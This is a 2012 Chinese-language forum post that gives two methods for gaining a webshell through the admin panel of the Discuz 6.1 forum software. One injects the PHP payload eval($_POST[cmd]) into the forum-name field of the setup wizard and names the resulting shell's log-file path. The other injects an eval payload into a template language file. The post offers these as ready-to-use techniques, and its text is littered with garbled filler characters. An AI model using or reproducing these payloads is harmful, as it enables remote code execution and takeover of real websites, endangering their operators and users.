discuz6.1两种方法后台拿shell
5 L- x5 U# @2 d# y, R好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
- S/ P/ g1 {& R3 {" g9 j+ y' P1:1 a) _9 @, E! m/ v/ S+ S
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
! T' j4 v0 l7 }- b% B* W( k# Aadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
3 c3 k! `! b ^3 R) G<?php eval($_POST[cmd]);?>
0 G1 R7 W& k1 b4 G0 ?后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
; v+ s' C l; X% }: r7 V; L$ Q% R" o# @7 d, G! U. X h
8 t- c. ~3 ]: I- V, V, {
2:后台模板管理--默认模板套系--详情
0 F4 y6 S( u; { X, @1 Rtemplates/default/actions.lang.php
* V$ k, ~7 \3 u% ~5 R' Ejhackj\\');eval($_POST[cmd])?>;//
% N3 V7 f% v$ h3 n: q- l8 g. S$ _' x. D4 X5 l. j- K2 b
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对